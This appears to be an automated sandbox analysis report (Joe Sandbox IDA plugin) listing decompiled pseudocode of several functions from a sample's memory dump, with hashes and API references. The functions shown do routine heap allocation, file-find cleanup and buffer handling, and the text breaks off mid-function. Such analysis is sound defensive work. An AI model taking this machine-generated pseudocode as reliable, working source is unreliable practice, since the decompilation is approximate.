Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e3a23d538e9668cf37f2a62c469d61891186c24c9ffe55bb753de65b91387bb5
Instruction ID: 65082dc8d86805bc43c57cf6987ffb1973360c86d0aa34b3cb186fd79ec424f5
Opcode Fuzzy Hash: e3a23d538e9668cf37f2a62c469d61891186c24c9ffe55bb753de65b91387bb5
Instruction Fuzzy Hash: 6D41D231C406559AFB26DB60CC54BEA77A8AF54310F0580EBE5CAA30D2DF755AC8DB50

Uniqueness

Uniqueness Score: -1.00%

Function 01001E00, Relevance: 1.6, APIs: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E01001E00(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t34;
				intOrPtr _t41;
				intOrPtr _t51;
				void* _t62;
				unsigned int _t64;
				signed int _t66;
				intOrPtr* _t68;
				void* _t70;

				_t62 = __edx;
				_t51 = __ecx;
				E0101E28C(E01031CCB, _t70);
				_t49 = 0;
				 *((intOrPtr*)(_t70 - 0x10)) = _t51;
				 *((intOrPtr*)(_t70 - 0x24)) = 0;
				 *(_t70 - 0x20) = 0;
				 *((intOrPtr*)(_t70 - 0x1c)) = 0;
				 *((intOrPtr*)(_t70 - 0x18)) = 0;
				 *((char*)(_t70 - 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				_t34 = E01003B3D(_t51, _t62, _t70 - 0x24, 0, 0); // executed
				if(_t34 != 0) {
					_t64 =  *(_t70 - 0x20);
					E010016D2(_t70 - 0x24, _t62, 1);
					_t68 =  *((intOrPtr*)(_t70 + 8));
					 *((char*)( *(_t70 - 0x20) +  *((intOrPtr*)(_t70 - 0x24)) - 1)) = 0;
					_t16 = _t64 + 1; // 0x1
					E01001849(_t68, _t16);
					_t41 =  *((intOrPtr*)(_t70 - 0x10));
					if( *((intOrPtr*)(_t41 + 0x6cb0)) != 3) {
						if(( *(_t41 + 0x45f4) & 0x00000001) == 0) {
							E0101137A( *((intOrPtr*)(_t70 - 0x24)),  *_t68,  *((intOrPtr*)(_t68 + 4)));
						} else {
							_t66 = _t64 >> 1;
							E010113F5( *((intOrPtr*)(_t70 - 0x24)),  *_t68, _t66);
							 *((short*)( *_t68 + _t66 * 2)) = 0;
						}
					} else {
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_push( *((intOrPtr*)(_t70 - 0x24)));
						E01011430();
					}
					E01001849(_t68, E010235B3( *_t68));
					_t49 = 1;
				}
				E010015A0(_t70 - 0x24);
				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
				return _t49;
			}

0x01001e00
0x01001e00
0x01001e05
0x01001e0e
0x01001e12
0x01001e15
0x01001e18
0x01001e1b
0x01001e1e
0x01001e21
0x01001e29
0x01001e2f
0x01001e36
0x01001e3e
0x01001e46
0x01001e51
0x01001e54
0x01001e58
0x01001e5e
0x01001e63
0x01001e6d
0x01001e85
0x01001ea6
0x01001e87
0x01001e87
0x01001e8f
0x01001e98
0x01001e98
0x01001e6f
0x01001e6f
0x01001e72
0x01001e74
0x01001e77
0x01001e77
0x01001eb6
0x01001ebc
0x01001ebe
0x01001ec2
0x01001ecd
0x01001ed7

APIs

__EH_prolog.LIBCMT ref: 01001E05

Part of subcall function 01003B3D: __EH_prolog.LIBCMT ref: 01003B42

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 488508edb4aa923fba5e8061c998a95980fe95946f9d2c77d31c2770cd2ef550
Instruction ID: 53166b73614ff567b7955c12e62e47091e09b7167c9be6df086b4f1e96709706
Opcode Fuzzy Hash: 488508edb4aa923fba5e8061c998a95980fe95946f9d2c77d31c2770cd2ef550
Instruction Fuzzy Hash: 3D212B7190414A9FDB16EFA9D9509EEFBF6BF58300F1001ADE585A7290CB329E10CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0101A7C3, Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0101A7C3(void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				short _t33;
				char _t36;
				void* _t47;
				short _t55;
				void* _t57;
				void* _t58;
				short _t60;
				void* _t62;
				intOrPtr _t64;
				void* _t67;

				_t67 = __eflags;
				_t57 = __edx;
				_t47 = __ecx;
				E0101E28C(E01032029, _t62);
				_push(_t47);
				E0101E360();
				_push(_t60);
				_push(_t58);
				 *((intOrPtr*)(_t62 - 0x10)) = _t64;
				 *((intOrPtr*)(_t62 - 4)) = 0;
				E01001380(_t62 - 0x7d24, _t57, _t58, _t67, 0); // executed
				 *((char*)(_t62 - 4)) = 1;
				E01001F4F(_t62 - 0x7d24, _t57, _t60, _t62, _t67,  *((intOrPtr*)(_t62 + 0xc)));
				if( *((intOrPtr*)(_t62 - 0x105f)) == 0) {
					 *((intOrPtr*)(_t62 - 0x24)) = 0;
					 *((intOrPtr*)(_t62 - 0x20)) = 0;
					 *((intOrPtr*)(_t62 - 0x1c)) = 0;
					 *((intOrPtr*)(_t62 - 0x18)) = 0;
					 *((char*)(_t62 - 0x14)) = 0;
					 *((char*)(_t62 - 4)) = 2;
					_push(_t62 - 0x24);
					_t50 = _t62 - 0x7d24;
					_t33 = E01001951(_t62 - 0x7d24, _t57);
					__eflags = _t33;
					if(_t33 != 0) {
						_t60 =  *((intOrPtr*)(_t62 - 0x20));
						_t58 = _t60 + _t60;
						_push(_t58 + 2);
						_t55 = E010235D3(_t50);
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x10)))) = _t55;
						__eflags = _t55;
						if(_t55 != 0) {
							__eflags = 0;
							 *((short*)(_t58 + _t55)) = 0;
							E0101F4B0(_t55,  *((intOrPtr*)(_t62 - 0x24)), _t58);
						} else {
							_t60 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14)))) = _t60;
					}
					E010015E7(_t62 - 0x24);
					E01001631(_t62 - 0x7d24, _t58, _t60); // executed
					_t36 = 1;
				} else {
					E01001631(_t62 - 0x7d24, _t58, _t60);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
				return _t36;
			}

0x0101a7c3
0x0101a7c3
0x0101a7c3
0x0101a7c8
0x0101a7cd
0x0101a7d3
0x0101a7d9
0x0101a7da
0x0101a7dd
0x0101a7e7
0x0101a7ea
0x0101a7f8
0x0101a7fc
0x0101a807
0x0101a818
0x0101a81b
0x0101a81e
0x0101a821
0x0101a824
0x0101a82a
0x0101a82e
0x0101a82f
0x0101a835
0x0101a83a
0x0101a83c
0x0101a83e
0x0101a841
0x0101a847
0x0101a84e
0x0101a853
0x0101a855
0x0101a857
0x0101a85d
0x0101a860
0x0101a868
0x0101a859
0x0101a859
0x0101a859
0x0101a873
0x0101a873
0x0101a878
0x0101a883
0x0101a888
0x0101a809
0x0101a80f
0x0101a814
0x0101a814
0x0101a88f
0x0101a89a

APIs

__EH_prolog.LIBCMT ref: 0101A7C8

Part of subcall function 01001380: __EH_prolog.LIBCMT ref: 01001385
Part of subcall function 01001380: new.LIBCMT ref: 010013FE

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f43b9d90b7fcc5cb0f424566f0d2d13eefe71cc7860e8b1bc9aa62aeb4b9caef
Instruction ID: 290a2e16f9712313901ef993fdc5dc7caea7b3df6b40b4c71ad5088cd84bd9ed
Opcode Fuzzy Hash: f43b9d90b7fcc5cb0f424566f0d2d13eefe71cc7860e8b1bc9aa62aeb4b9caef
Instruction Fuzzy Hash: 01213071D0529ADEDF15DF98C9515EEB7F4AF29300F1004DED849A7241DB39AE06CB60

Uniqueness

Uniqueness Score: -1.00%

Function 010092E6, Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E010092E6(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				void* _t21;
				intOrPtr _t22;
				intOrPtr _t27;
				void* _t35;
				intOrPtr _t37;
				intOrPtr _t40;
				void* _t42;
				void* _t49;

				_t35 = __edx;
				E0101E28C(E01031F37, _t42);
				E0100709D(_t42 - 0x20, E01007DC6());
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				_t40 = E0100CA6C( *((intOrPtr*)(_t42 + 8)),  *((intOrPtr*)(_t42 - 0x20)),  *((intOrPtr*)(_t42 - 0x1c)));
				if(_t40 > 0) {
					_t27 =  *((intOrPtr*)(_t42 + 0x10));
					_t37 =  *((intOrPtr*)(_t42 + 0xc));
					do {
						_t22 = _t40;
						asm("cdq");
						_t49 = _t35 - _t27;
						if(_t49 > 0 || _t49 >= 0 && _t22 >= _t37) {
							_t40 = _t37;
						}
						if(_t40 > 0) {
							E0100CC51( *((intOrPtr*)(_t42 + 8)), _t42,  *((intOrPtr*)(_t42 - 0x20)), _t40);
							asm("cdq");
							_t37 = _t37 - _t40;
							asm("sbb ebx, edx");
						}
						_t40 = E0100CA6C( *((intOrPtr*)(_t42 + 8)),  *((intOrPtr*)(_t42 - 0x20)),  *((intOrPtr*)(_t42 - 0x1c)));
					} while (_t40 > 0);
				}
				_t21 = E010015A0(_t42 - 0x20); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return _t21;
			}

0x010092e6
0x010092eb
0x010092fd
0x0100930b
0x01009314
0x01009318
0x0100931b
0x0100931f
0x01009322
0x01009322
0x01009324
0x01009325
0x01009327
0x0100932f
0x0100932f
0x01009333
0x0100933c
0x01009343
0x01009344
0x01009346
0x01009346
0x01009356
0x01009358
0x0100935d
0x01009361
0x0100936a
0x01009374

APIs

__EH_prolog.LIBCMT ref: 010092EB

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cf26d5eecd47a5df065a9b9fafebc4c65b3b68cbb73fbeb6865abc06b4c58b30
Instruction ID: 8883ba4311714115a7e383fa418815dec68b86d45688f4bfa840ab4d16299f12
Opcode Fuzzy Hash: cf26d5eecd47a5df065a9b9fafebc4c65b3b68cbb73fbeb6865abc06b4c58b30
Instruction Fuzzy Hash: DC11A573E005299BEB23AFA8CC509DEB775EF58754F058255EC98772D0CA3599108AA0

Uniqueness

Uniqueness Score: -1.00%

Function 0100AA88, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0100AA88(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* __esi;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t16;
				intOrPtr* _t22;

				_push(__ecx);
				_t22 = __ecx;
				_t24 =  *((intOrPtr*)(__ecx + 8));
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					_t15 = E0101E24A(__edx, __ecx, _t24, 0xb54); // executed
					_v8 = _t15;
					_t25 = _t15;
					if(_t15 == 0) {
						_t16 = 0;
						__eflags = 0;
					} else {
						_t16 = E0100A8E1(_t15, _t25);
					}
					 *((intOrPtr*)(_t22 + 8)) = _t16;
				}
				_t12 = _a4;
				 *_t22 = _t12;
				if(_t12 == 1) {
					 *(_t22 + 4) =  *(_t22 + 4) & 0x00000000;
				}
				if(_t12 == 2) {
					 *(_t22 + 4) =  *(_t22 + 4) | 0xffffffff;
				}
				if(_t12 == 3) {
					E010059CB( *((intOrPtr*)(_t22 + 8)));
				}
				_t13 = _a8;
				if(_t13 >= 8) {
					_t13 = 8;
				}
				 *((intOrPtr*)(_t22 + 0x10)) = _t13;
				return _t13;
			}

0x0100aa8b
0x0100aa8d
0x0100aa8f
0x0100aa93
0x0100aa9a
0x0100aa9f
0x0100aaa3
0x0100aaa5
0x0100aab0
0x0100aab0
0x0100aaa7
0x0100aaa9
0x0100aaa9
0x0100aab2
0x0100aab2
0x0100aab5
0x0100aab8
0x0100aabd
0x0100aabf
0x0100aabf
0x0100aac6
0x0100aac8
0x0100aac8
0x0100aacf
0x0100aad4
0x0100aad4
0x0100aad9
0x0100aadf
0x0100aae3
0x0100aae3
0x0100aae4
0x0100aaeb

APIs

new.LIBCMT ref: 0100AA9A

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction ID: 644b612c90ca2fd4911f5b9c2a59d562f4f4914b93f583a250982b56fd4ad0ca
Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction Fuzzy Hash: C9F08C30A10706DFEB72DA68C94469ABBE4EB16230F208A5AD4DAC76C0E770D4C08750

Uniqueness

Uniqueness Score: -1.00%

Function 01005BD7, Relevance: 1.5, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01005BD7(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t25;
				intOrPtr _t34;
				void* _t36;

				_t25 = __ecx;
				E0101E28C(E01031D6E, _t36);
				_push(_t25);
				_t34 = _t25;
				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
				E0100B07D(_t25); // executed
				_t2 = _t36 - 4;
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E0100FE8B();
				 *(_t36 - 4) = 1;
				E0100FE8B();
				 *(_t36 - 4) = 2;
				E0100FE8B();
				 *(_t36 - 4) = 3;
				E0100FE8B();
				 *(_t36 - 4) = 4;
				E0100FE8B();
				 *(_t36 - 4) = 5;
				E01005DCC(_t34,  *_t2);
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}

0x01005bd7
0x01005bdc
0x01005be1
0x01005be3
0x01005be5
0x01005be8
0x01005bed
0x01005bed
0x01005bf7
0x01005c02
0x01005c06
0x01005c11
0x01005c15
0x01005c20
0x01005c24
0x01005c2f
0x01005c33
0x01005c3a
0x01005c3e
0x01005c49
0x01005c53

APIs

__EH_prolog.LIBCMT ref: 01005BDC

Part of subcall function 0100B07D: __EH_prolog.LIBCMT ref: 0100B082

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: fb7033b9d79c3e14261f658fc2d8c1af31709281847cedd130fe9b4804aa615b
Instruction ID: 6ec196dec996dcc7b256cda135c2897919cd66b1d344cb1ce451cc43ea0895ab
Opcode Fuzzy Hash: fb7033b9d79c3e14261f658fc2d8c1af31709281847cedd130fe9b4804aa615b
Instruction Fuzzy Hash: C301AD30A04686DAE726F7A4C0143DDFBA49F69B40F40408E989E132C2CFB41B09D662

Uniqueness

Uniqueness Score: -1.00%

Function 01028518, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E01028518(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E0102895A())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x10616ec, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E01028394();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E010271AD(_t7, _t8, _t9, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x01028518
0x0102851e
0x01028524
0x01028556
0x0102855b
0x01028561
0x00000000
0x01028561
0x01028528
0x0102852a
0x0102852a
0x01028541
0x0102854a
0x01028552
0x00000000
0x00000000
0x01028532
0x01028534
0x00000000
0x00000000
0x01028537
0x0102853c
0x0102853d
0x0102853f
0x00000000
0x00000000
0x0102853f
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102C13D,00000000,?,010267E2,?,00000008,?,010289AD,?,?,?), ref: 0102854A

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 22e15bc010b72b393cc5573c52097fa7f9f0d09b91c07eb994f9e40a4a4cdc76
Instruction ID: 1079f18532cb465aea63023ead6857f64ab1ab414c3e3d5cf790730e343eaad4
Opcode Fuzzy Hash: 22e15bc010b72b393cc5573c52097fa7f9f0d09b91c07eb994f9e40a4a4cdc76
Instruction Fuzzy Hash: D7E0E53D6401325AEB712A6D5C00B9A3BCC9F512B0F44C253EDD4A608DCB24C80086E5

Uniqueness

Uniqueness Score: -1.00%

Function 010096D0, Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E010096D0(void* __ecx) {
				void* _t16;
				void* _t21;

				_t21 = __ecx;
				_t16 = 1;
				if( *(__ecx + 4) != 0xffffffff) {
					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
						_t5 = FindCloseChangeNotification( *(__ecx + 4)) - 1; // -1
						asm("sbb bl, bl");
						_t16 =  ~_t5 + 1;
					}
					 *(_t21 + 4) =  *(_t21 + 4) | 0xffffffff;
				}
				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x1a)) != _t16) {
					E01006E3E(0x1040f50, _t21 + 0x24);
				}
				return _t16;
			}

0x010096d2
0x010096d4
0x010096da
0x010096e0
0x010096f1
0x010096f6
0x010096f8
0x010096f8
0x010096fa
0x010096fa
0x010096fe
0x01009704
0x01009714
0x01009714
0x0100971d

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,0100968F,?,?,?,?,01031FA1,000000FF), ref: 010096EB

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: f2def2bb29abfdd29b701c2091d2b20aafb12b8b439a584012896f4de50f4771
Instruction ID: e7e498ed124dd011f876614f1fe91eb155b9aec0c9ff69409020135fa64e419d
Opcode Fuzzy Hash: f2def2bb29abfdd29b701c2091d2b20aafb12b8b439a584012896f4de50f4771
Instruction Fuzzy Hash: E1F0B4314467004FFB328A28D9A8792B7E46B06329F044B6E91EF034D2D765604DCB00

Uniqueness

Uniqueness Score: -1.00%

Function 0100A4C6, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0100A4C6(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _t12;
				intOrPtr _t20;

				_t20 = _a8;
				 *((char*)(_t20 + 0x1044)) = 0;
				if(E0100B925(_a4) == 0) {
					_t12 = E0100A5F4(__edx, 0xffffffff, _a4, _t20);
					if(_t12 == 0xffffffff) {
						goto L1;
					}
					FindClose(_t12); // executed
					 *(_t20 + 0x1040) =  *(_t20 + 0x1040) & 0x00000000;
					 *((char*)(_t20 + 0x100c)) = E0100A1E2( *((intOrPtr*)(_t20 + 0x1008)));
					 *((char*)(_t20 + 0x100d)) = E0100A1FA( *((intOrPtr*)(_t20 + 0x1008)));
					return 1;
				}
				L1:
				return 0;
			}

0x0100a4c7
0x0100a4cf
0x0100a4dd
0x0100a4ea
0x0100a4f2
0x00000000
0x00000000
0x0100a4f5
0x0100a501
0x0100a513
0x0100a51e
0x00000000
0x0100a524
0x0100a4df
0x00000000

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0100A4F5

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 1351ed66daab2a376e854ab62c8cee70ee305f1d4e3ede74083b6eb26202724a
Instruction ID: cf147f58a40ddbdb878864312267031d331c19bfdd92287eef0cfcc196a7ac2e
Opcode Fuzzy Hash: 1351ed66daab2a376e854ab62c8cee70ee305f1d4e3ede74083b6eb26202724a
Instruction Fuzzy Hash: 34F0BE35008380EAEA235BB888047CABFA4AF2A362F04CA49E1FD031D0C27910998722

Uniqueness

Uniqueness Score: -1.00%

Function 0101067C, Relevance: 1.5, APIs: 1, Instructions: 21
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0101067C() {
				void* __esi;
				void* _t2;

				L0101134B(); // executed
				_t2 = E01011350();
				if(_t2 != 0) {
					_t2 = E01006E8C(_t2, 0x1040f50, 0xff, 0xff);
				}
				if( *0x1040f5c != 0) {
					_t2 = E01006E8C(_t2, 0x1040f50, 0xff, 0xff);
				}
				__imp__SetThreadExecutionState(1);
				return _t2;
			}

0x0101067e
0x01010683
0x01010694
0x01010699
0x01010699
0x010106a5
0x010106aa
0x010106aa
0x010106b1
0x010106b9

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 010106B1

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: fd2d850b85382bfe36703305618742770935e06b8e3645d648c664283c4d512b
Instruction ID: f494693e733d18d28f37fbda9ff048e2ba7b3203286a58458b7a469c42f84003
Opcode Fuzzy Hash: fd2d850b85382bfe36703305618742770935e06b8e3645d648c664283c4d512b
Instruction Fuzzy Hash: ABD0C2302001512AE6263338A8847FE1A4B0FC6610F180061B6CD279CECF5F088643A2

Uniqueness

Uniqueness Score: -1.00%

Function 01019D7B, Relevance: 1.5, APIs: 1, Instructions: 17
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E01019D7B(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t6;

				_push(__ecx);
				_push(0x10);
